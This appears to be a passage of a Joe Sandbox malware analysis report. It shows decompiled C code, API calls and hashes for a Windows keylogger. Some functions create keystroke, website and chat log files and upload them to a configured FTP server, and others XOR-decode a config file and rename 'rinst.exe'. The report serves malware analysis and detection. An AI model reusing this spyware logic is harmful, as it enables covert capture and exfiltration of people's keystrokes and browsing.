				if(__ebx == 0) {
					_push("User defined");
					L0043DE26();
					_push("Open");
					L0043DE26();
					_push("Print");
					L0043DE26();
					_push("Explore");
					L0043DE26();
					_push("E-mail");
					L0043DE26();
					return __eax;
				} else {
					asm("aad 0xa9");
					return (__eax | __ecx) +  *(__eax | __ecx); // executed
				}
			}

0x00403e43
0x00403e69
0x00403e73
0x00403e78
0x00403e82
0x00403e87
0x00403e91
0x00403e96
0x00403ea0
0x00403ea5
0x00403eaf
0x00403eb4
0x00403e45
0x00403e47
0x00403e4d
0x00403e4d

APIs

#537.MFC42(User defined), ref: 00403E73
#537.MFC42(Open,User defined), ref: 00403E82
#537.MFC42(Print,Open,User defined), ref: 00403E91
#537.MFC42(Explore,Print,Open,User defined), ref: 00403EA0
#537.MFC42(E-mail,Explore,Print,Open,User defined), ref: 00403EAF

Strings

Open, xrefs: 00403E78
E-mail, xrefs: 00403EA5
Explore, xrefs: 00403E96
Print, xrefs: 00403E87
User defined, xrefs: 00403E69

Memory Dump Source

Source File: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Similarity

API ID: #537
String ID: E-mail$Explore$Open$Print$User defined
API String ID: 4256512136-311612163
Opcode ID: 77a1ef7df0a1a2299b9292e6f674efe3d1e6e0db80eae300491140485ebbe17c
Instruction ID: 6baa1e6d6a725d20f4853b6735982a7f3838682df7a0f979331674cfab6a53ae
Opcode Fuzzy Hash: 77a1ef7df0a1a2299b9292e6f674efe3d1e6e0db80eae300491140485ebbe17c
Instruction Fuzzy Hash: 88E08C01F44E80974628BE61A43367D2E01CBE8BC7764A25FBD021E1E38E9C0A1C422D

Uniqueness

Uniqueness Score: -1.00%

Function 0041FF1D, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 47
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 65%

			E0041FF1D(void* __eflags) {
				int _t17;
				CHAR** _t18;
				char* _t28;
				void* _t33;

				E0043E4E0(0x441e3c, _t33);
				E0042A660(_t33 - 0x118, 1, 0);
				_t28 = "rinst.exe";
				_t16 = _t33 - 0x14;
				_push(_t28);
				_push(0x4558c8);
				_push(_t33 - 0x14);
				L0043DE20();
				 *(_t33 - 4) =  *(_t33 - 4) & 0x00000000;
				_t17 = E00428DCB( *_t16); // executed
				 *(_t33 - 4) =  *(_t33 - 4) | 0xffffffff;
				L0043DD36();
				if(_t17 != 0) {
					_push(_t28);
					_t18 = _t33 - 0x10;
					_push(0x4558c8);
					_push(_t18);
					L0043DE20();
					_t17 = MoveFileA( *_t18, _t33 - 0x118);
					L0043DD36();
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t33 - 0xc));
				return _t17;
			}

0x0041ff22
0x0041ff3b
0x0041ff43
0x0041ff4d
0x0041ff50
0x0041ff51
0x0041ff52
0x0041ff53
0x0041ff5a
0x0041ff5e
0x0041ff63
0x0041ff6d
0x0041ff74
0x0041ff76
0x0041ff77
0x0041ff7a
0x0041ff7b
0x0041ff7c
0x0041ff8a
0x0041ff93
0x0041ff93
0x0041ff9e
0x0041ffa6

APIs

__EH_prolog.LIBCMT ref: 0041FF22

Part of subcall function 0042A660: GetModuleFileNameA.KERNEL32(00000000,?,00000103,?,00000000,?,00419205,?,00000005,00000000), ref: 0042A66F
Part of subcall function 0042A660: lstrlenA.KERNEL32(?,?,00000000,?,00419205,?,00000005,00000000), ref: 0042A67C
Part of subcall function 0042A660: lstrlenA.KERNEL32(?,00000000,?,00419205,?,00000005,00000000), ref: 0042A68B
Part of subcall function 0042A660: lstrcatA.KERNEL32(?,?,00000000,?,00419205,?,00000005,00000000), ref: 0042A6A0

#924.MFC42(?,004558C8,rinst.exe), ref: 0041FF53

Part of subcall function 00428DCB: memset.MSVCRT ref: 00428DE2
Part of subcall function 00428DCB: FindFirstFileA.KERNELBASE(?,?), ref: 00428DF4

#800.MFC42(?,004558C8,rinst.exe), ref: 0041FF6D
#924.MFC42(?,004558C8,rinst.exe,?,004558C8,rinst.exe), ref: 0041FF7C
MoveFileA.KERNEL32 ref: 0041FF8A
#800.MFC42 ref: 0041FF93

Strings

rinst.exe, xrefs: 0041FF43, 0041FF50, 0041FF76

Memory Dump Source

Source File: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Similarity

API ID: File$#800#924lstrlen$FindFirstH_prologModuleMoveNamelstrcatmemset
String ID: rinst.exe
API String ID: 1090809799-2036006234
Opcode ID: 82e2414bda17109ac939241e3222086aab483a7774587a2c4f9c52cdf50d2b86
Instruction ID: f3093b62ff86694fb6e3fccf50743f3fd4b5af4d8b9a602e62b7de5d7cd47f71
Opcode Fuzzy Hash: 82e2414bda17109ac939241e3222086aab483a7774587a2c4f9c52cdf50d2b86
Instruction Fuzzy Hash: D2019E32D00118AACB24EBE2E84AFDF7B78EB59314F00056EB515A7081DB384A08CA64

Uniqueness

Uniqueness Score: -1.00%

Function 0040BBE2, Relevance: 7.6, APIs: 5, Instructions: 54
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 75%

			E0040BBE2(void* __ecx, long _a4) {
				void* _t4;
				int _t8;
				void* _t10;
				void* _t16;
				void* _t17;
				void* _t18;

				_t18 = __ecx; // executed
				_t4 = CreateFileA(_a4, 0x80000000, 1, 0, 3, 0, 0); // executed
				_t17 = _t4;
				if(_t17 == 0xffffffff) {
					L5:
					return 0;
				}
				if(GetFileSize(_t17, 0) == 0x1070) {
					_t8 = ReadFile(_t17, _t18, 0x1070,  &_a4, 0);
					_push(_t17);
					if(_t8 != 0) {
						CloseHandle();
						_t16 = _t18 + 0x1070;
						_t10 = _t18;
						if(_t18 >= _t16) {
							L8:
							return 1;
						} else {
							goto L7;
						}
						do {
							L7:
							 *_t10 =  *_t10 ^ 0x000000aa;
							_t10 = _t10 + 1;
						} while (_t10 < _t16);
						goto L8;
					}
					L4:
					CloseHandle();
					goto L5;
				}
				_push(_t17);
				goto L4;
			}

0x0040bbf9
0x0040bbfb
0x0040bc01
0x0040bc06
0x0040bc35
0x00000000
0x0040bc35
0x0040bc17
0x0040bc24
0x0040bc2c
0x0040bc2d
0x0040bc39
0x0040bc3f
0x0040bc45
0x0040bc49
0x0040bc53
0x00000000
0x00000000
0x00000000
0x00000000
0x0040bc4b
0x0040bc4b
0x0040bc4b
0x0040bc4e
0x0040bc4f
0x00000000
0x0040bc4b
0x0040bc2f
0x0040bc2f
0x00000000
0x0040bc2f
0x0040bc19
0x00000000

APIs

CreateFileA.KERNELBASE(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0040BBFB
GetFileSize.KERNEL32(00000000,00000000), ref: 0040BC0A
ReadFile.KERNEL32(00000000,?,00001070,?,00000000), ref: 0040BC24
CloseHandle.KERNEL32(00000000,?,00001070,?,00000000), ref: 0040BC2F
CloseHandle.KERNEL32(00000000,?,00001070,?,00000000), ref: 0040BC39

Memory Dump Source

Source File: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Similarity

API ID: File$CloseHandle$CreateReadSize
String ID:
API String ID: 3664964396-0
Opcode ID: 570956207296f7c4ab01858c5de894a7153637b9e2fe62243e54270b13043310
Instruction ID: a71d09fd1a0274597eb4b1fe31ad0f5805eb20cf226668bf68a77ac8ba911590
Opcode Fuzzy Hash: 570956207296f7c4ab01858c5de894a7153637b9e2fe62243e54270b13043310
Instruction Fuzzy Hash: 6F01F735104108BEF7241B649C88FB73A6CD7A37A5B10063EF612E62D0DB745C8282BC

Uniqueness

Uniqueness Score: -1.00%

Function 0043EBEA, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 6
COMMON

Download Yara Rule

C-Code - Quality: 28%

			E0043EBEA(void* __eax, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, char _a16) {

				_t1 =  &_a16; // 0x43e8e2
				_push( *_t1);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				L0043EC48(); // executed
				return __eax;
			}

0x0043ebea
0x0043ebea
0x0043ebee
0x0043ebf2
0x0043ebf6
0x0043ebfa
0x0043ebff

APIs

#1576.MFC42(?,?,?,C,0043E8E2,00000000,?,0000000A), ref: 0043EBFA

Strings

C, xrefs: 0043EBEA

Memory Dump Source

Source File: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Similarity

API ID: #1576
String ID: C
API String ID: 1976119259-2515487769
Opcode ID: 98812f7e98be52a91f64d10adafef66e323b9058a040c87af58a0a1629adb3d9
Instruction ID: 49c87f1e772037b25e41f68cdd361f47a4e1822e88400bebf4c8f5ac9de8b9f4
Opcode Fuzzy Hash: 98812f7e98be52a91f64d10adafef66e323b9058a040c87af58a0a1629adb3d9
Instruction Fuzzy Hash: 33B00836019386ABDB06EE91880196EBAA2BB98314F586C1DB2A1000A587668428AB16

Uniqueness

Uniqueness Score: -1.00%

Function 0041AFA6, Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 26
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041AFA6(intOrPtr _a4, CHAR* _a8) {
				char _v68;
				int _t8;
				void* _t10;
				void* _t11;
				CHAR* _t12;

				E0041AD0E(_t11, _a4, "_r <()<1-Z2[l5,^",  &_v68);
				_t12 = _a8;
				_t8 = lstrcmpiA( &_v68, _t12); // executed
				if(_t8 != 0 ||  *_t12 == _t8) {
					return 0;
				} else {
					_t10 = 1;
					return _t10;
				}
			}

0x0041afb9
0x0041afbe
0x0041afc9
0x0041afd1
0x00000000
0x0041afd7
0x0041afd9
0x00000000
0x0041afd9

APIs

Part of subcall function 0041AD0E: lstrlenA.KERNEL32(?), ref: 0041AD1E
Part of subcall function 0041AD0E: lstrlenA.KERNEL32(?), ref: 0041AD28

lstrcmpiA.KERNEL32(?,?), ref: 0041AFC9

Strings

_r <()<1-Z2[l5,^, xrefs: 0041AFB1

Memory Dump Source

Source File: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Similarity

API ID: lstrlen$lstrcmpi
String ID: _r <()<1-Z2[l5,^
API String ID: 1808961391-4178176214
Opcode ID: 8951ff7e72835721d766f7c8ad831a30e587c82331da3f3e94c9c864e4d86370
Instruction ID: b492154342c7a6bd4aa1abe367ad41c9b814a400d9aebbfd25be3698167cd68d
Opcode Fuzzy Hash: 8951ff7e72835721d766f7c8ad831a30e587c82331da3f3e94c9c864e4d86370
Instruction Fuzzy Hash: 27E0DFB1501218BADB20AF61AC0ABEF3B6C9B00350B040427FC01D6241E664E9A7969A

Uniqueness

Uniqueness Score: -1.00%

Function 0043E534, Relevance: 3.0, APIs: 2, Instructions: 12COMMON

Download Yara Rule

APIs

_onexit.KERNELBASE ref: 0043E541
__dllonexit.MSVCRT ref: 0043E557

Memory Dump Source

Source File: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Similarity

API ID: __dllonexit_onexit
String ID:
API String ID: 2384194067-0
Opcode ID: 930135da46e59631227af801569e5384dbd8e9b48d65ea7726111ac70d8eb099
Instruction ID: 1dbce99dce1505e9b5210be75a9b5fbfe5f35aa4d9610a846aba862af67eb4b7
Opcode Fuzzy Hash: 930135da46e59631227af801569e5384dbd8e9b48d65ea7726111ac70d8eb099
Instruction Fuzzy Hash: 72C02270004B00BECE023711BD026693710AB90733F30822AF520000F387390615BE89

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 004258FF, Relevance: 273.9, APIs: 140, Strings: 16, Instructions: 921
COMMON

Download Yara Rule

C-Code - Quality: 71%

			E004258FF(void* __edx) {
				void* __esi;
				void* _t420;
				void* _t428;
				int _t431;
				CHAR* _t432;
				CHAR* _t433;
				char* _t434;
				signed int _t435;
				signed int _t441;
				void* _t445;
				int _t450;
				int _t458;
				void* _t459;
				int _t466;
				void* _t467;
				void* _t468;
				void* _t469;
				char** _t477;
				CHAR** _t483;
				void* _t487;
				CHAR** _t488;
				CHAR** _t495;
				CHAR* _t498;
				void* _t499;
				void* _t500;
				CHAR** _t501;
				CHAR* _t503;
				void* _t504;
				void* _t505;
				CHAR** _t506;
				char* _t512;
				char* _t513;
				char* _t514;
				int _t516;
				int _t519;
				void* _t528;
				char* _t530;
				signed int _t532;
				CHAR* _t533;
				void* _t534;
				void* _t535;
				CHAR** _t536;
				CHAR* _t538;
				signed int _t542;
				char* _t543;
				signed int _t545;
				char* _t546;
				signed int _t548;
				char* _t549;
				signed int _t554;
				signed int _t555;
				signed int _t556;
				signed int _t557;
				signed int _t558;
				signed int _t559;
				signed int _t565;
				signed int _t577;
				void* _t585;
				void* _t661;
				void* _t666;
				char* _t669;
				signed int _t672;
				void* _t676;
				void* _t678;
				void* _t679;

				_t659 = __edx;
				E0043E4E0(0x442b26, _t676);
				_t679 = _t678 - 0x5c4;
				 *(_t676 - 0x44) =  *(_t676 - 0x44) & 0x00000000;
				_push(_t676 - 0x2c);
				L0043E162();
				_t661 =  *(_t676 + 8);
				if( *(_t661 + 0x369) != 0) {
					_push("bpk.dat");
					_push(0x4558c4);
					_push(_t676 - 0x1c);
					L0043DE20();
					 *(_t676 - 4) =  *(_t676 - 4) & 0x00000000;
					_push("web.dat");
					_push(0x4558c4);
					_push(_t676 - 0x24);
					L0043DE20();
					_push("bpkch.dat");
					_push(0x4558c4);
					_push(_t676 - 0x20);
					 *(_t676 - 4) = 1;
					L0043DE20();
					_push("keystrokes.html");
					_push(0x4558c8);
					_push(_t676 - 0x50);
					 *(_t676 - 4) = 2;
					L0043DE20();
					_push("websites.html");
					_push(0x4558c8);
					_push(_t676 - 0x54);
					 *(_t676 - 4) = 3;
					L0043DE20();
					_push("chats.html");
					_push(0x4558c8);
					_push(_t676 - 0x58);
					 *(_t676 - 4) = 4;
					L0043DE20();
					__eflags =  *((char*)(_t661 + 0x140));
					 *(_t676 - 4) = 5;
					if( *((char*)(_t661 + 0x140)) != 0) {
						_push(0);
						_push( *(_t676 - 0x50));
						_push( *(_t676 - 0x1c));
						_t557 = E0042A486(__edx);
						_t679 = _t679 + 0xc;
						__eflags = _t557;
						if(_t557 != 0) {
							_push(_t676 - 0x50);
							L0043DFCA();
						}
						__eflags =  *((char*)(_t661 + 0x140));
						if( *((char*)(_t661 + 0x140)) != 0) {
							_push(1);
							_push( *(_t676 - 0x54));
							_push( *(_t676 - 0x24));
							_t558 = E0042A486(_t659);
							_t679 = _t679 + 0xc;
							__eflags = _t558;
							if(_t558 != 0) {
								_push(_t676 - 0x54);
								L0043DFCA();
							}
							__eflags =  *((char*)(_t661 + 0x140));
							if( *((char*)(_t661 + 0x140)) != 0) {
								_push(2);
								_push( *(_t676 - 0x58));
								_push( *(_t676 - 0x20));
								_t559 = E0042A486(_t659);
								_t679 = _t679 + 0xc;
								__eflags = _t559;
								if(_t559 != 0) {
									_push(_t676 - 0x58);
									L0043DFCA();
								}
							}
						}
					}
					_t565 = 0;
					 *(_t676 + 8) = 0;
					E0042835B(_t676 - 0x84, 0, 1);
					 *(_t676 - 0x88) =  *(_t676 - 0x88) & 0;
					__eflags =  *(_t661 + 0x362);
					 *(_t676 - 4) = 6;
					if( *(_t661 + 0x362) != 0) {
						_t556 = _t676 - 0x2b4;
						_push(_t556);
						_push( *(_t676 - 0x1c));
						L0043E294();
						__eflags = _t556;
						if(_t556 != 0) {
							_t565 =  *(_t676 - 0x2a8);
							 *(_t676 + 8) = _t565;
						}
					}
					__eflags =  *((char*)(_t661 + 0x364));
					if( *((char*)(_t661 + 0x364)) != 0) {
						_t555 = _t676 - 0x2b4;
						_push(_t555);
						_push( *(_t676 - 0x24));
						L0043E294();
						__eflags = _t555;
						if(_t555 != 0) {
							_t565 = _t565 +  *(_t676 - 0x2a8);
							__eflags = _t565;
							 *(_t676 + 8) = _t565;
						}
					}
					__eflags =  *((char*)(_t661 + 0x363));
					if( *((char*)(_t661 + 0x363)) != 0) {
						_t554 = _t676 - 0x2b4;
						_push(_t554);
						_push( *(_t676 - 0x20));
						L0043E294();
						__eflags = _t554;
						if(_t554 != 0) {
							_t565 = _t565 +  *(_t676 - 0x2a8);
							__eflags = _t565;
							 *(_t676 + 8) = _t565;
						}
					}
					__eflags =  *((char*)(_t661 + 0x365));
					if( *((char*)(_t661 + 0x365)) != 0) {
						_push(_t676 - 0x88);
						_push(_t676 - 0x84);
						_push(_t661);
						E004255B0(_t659);
						_t679 = _t679 + 0xc;
						_t565 = _t565 +  *(_t676 - 0x88);
						__eflags = _t565;
						 *(_t676 + 8) = _t565;
					}
					__eflags = _t565;
					if(_t565 != 0) {
						L0043DDD8();
						__eflags =  *((char*)(_t661 + 0x14f));
						 *(_t676 - 4) = 7;
						if( *((char*)(_t661 + 0x14f)) == 0) {
							L45:
							__eflags =  *((char*)(_t661 + 0x366));
							if( *((char*)(_t661 + 0x366)) == 0) {
								L53:
								lstrcpyA(_t676 - 0x19c, _t661 + 0x569);
								__eflags =  *(_t676 - 0x19c);
								if( *(_t676 - 0x19c) == 0) {
									lstrcpyA(_t676 - 0x19c, "/");
								}
								_t420 = InternetOpenA("PK", 0, 0, 0, 0);
								__eflags = _t420;
								 *(_t676 - 0x28) = _t420;
								_push(0);
								if(_t420 != 0) {
									asm("sbb eax, eax");
									_t428 = InternetConnectA( *(_t676 - 0x28), _t661 + 0x369,  *(_t661 + 0x106c), _t661 + 0x469, _t661 + 0x4e9, 1,  ~( *(_t661 + 0x368)) & 0x08000000, ??);
									__eflags = _t428;
									 *(_t676 + 8) = _t428;
									if(_t428 != 0) {
										__eflags =  *(_t676 - 0x19c);
										if( *(_t676 - 0x19c) == 0) {
											L63:
											 *(_t676 - 0x70) = 0x7f;
											_t431 = GetComputerNameA(_t676 - 0x3b4, _t676 - 0x70);
											_push(0);
											L0043E288();
											_t432 =  *_t431;
											_push(0);
											 *(_t676 - 0x14) = _t432;
											L0043E288();
											_t433 = _t432[4];
											_push(0);
											 *(_t676 - 0x3c) = _t433;
											L0043E288();
											_t434 = _t433[8];
											_push(0);
											 *(_t676 - 0x40) = _t434;
											L0043E288();
											_t435 = _t434[0xc];
											_push(0);
											 *(_t676 - 0x34) = _t435;
											L0043E288();
											_push(0);
											_t585 = _t676 - 0x2c;
											L0043E288();
											sprintf(_t676 - 0x4b8, "%02d-%02d-%02d-%02d-%02d-%02d",  *((intOrPtr*)(_t435 + 0x14)) + 0x76c,  *((intOrPtr*)(_t435 + 0x10)) + 1,  *(_t676 - 0x34),  *(_t676 - 0x40),  *(_t676 - 0x3c),  *(_t676 - 0x14));
											_t441 = FtpCreateDirectoryA( *(_t676 + 8), _t676 - 0x4b8);
											__eflags = _t441;
											if(_t441 == 0) {
												L68:
												InternetCloseHandle( *(_t676 + 8));
												_push( *(_t676 - 0x28));
												L51:
												DeleteFileA();
												L52:
												_t666 = 0;
												 *0x4558e8 = 0;
												goto L115;
											}
											__eflags =  *(_t676 - 0x19c);
											if( *(_t676 - 0x19c) != 0) {
												_t516 = lstrlenA(_t676 - 0x19c);
												__eflags =  *((char*)(_t676 + _t516 - 0x19d)) - 0x2f;
												if( *((char*)(_t676 + _t516 - 0x19d)) != 0x2f) {
													lstrcatA(_t676 - 0x19c, "/");
												}
											}
											lstrcatA(_t676 - 0x19c, _t676 - 0x4b8);
											_t450 = FtpSetCurrentDirectoryA( *(_t676 + 8), _t676 - 0x19c);
											__eflags = _t450;
											if(_t450 != 0) {
												__eflags =  *((char*)(_t661 + 0x14f));
												if( *((char*)(_t661 + 0x14f)) == 0) {
													__eflags =  *(_t661 + 0x362);
													if( *(_t661 + 0x362) != 0) {
														_t450 = E00428DCB( *(_t676 - 0x1c));
														__eflags = _t450;
														_pop(_t585);
														if(_t450 != 0) {
															__eflags =  *((char*)(_t661 + 0x140));
															_t514 = "keystrokes.html";
															if( *((char*)(_t661 + 0x140)) == 0) {
																_t514 = "bpk.dat";
															}
															_t450 = FtpPutFileA( *(_t676 + 8),  *(_t676 - 0x1c), _t514, 2, 0);
														}
													}
												}
												__eflags =  *((char*)(_t661 + 0x14f));
												if( *((char*)(_t661 + 0x14f)) != 0) {
													L88:
													_t450 = FtpPutFileA( *(_t676 + 8),  *(_t676 - 0x38), "Logs.zip", 2, 0);
													goto L89;
												} else {
													__eflags =  *((char*)(_t661 + 0x364));
													if( *((char*)(_t661 + 0x364)) != 0) {
														_t450 = E00428DCB( *(_t676 - 0x24));
														__eflags = _t450;
														_pop(_t585);
														if(_t450 != 0) {
															__eflags =  *((char*)(_t661 + 0x140));
															_t513 = "websites.html";
															if( *((char*)(_t661 + 0x140)) == 0) {
																_t513 = "web.dat";
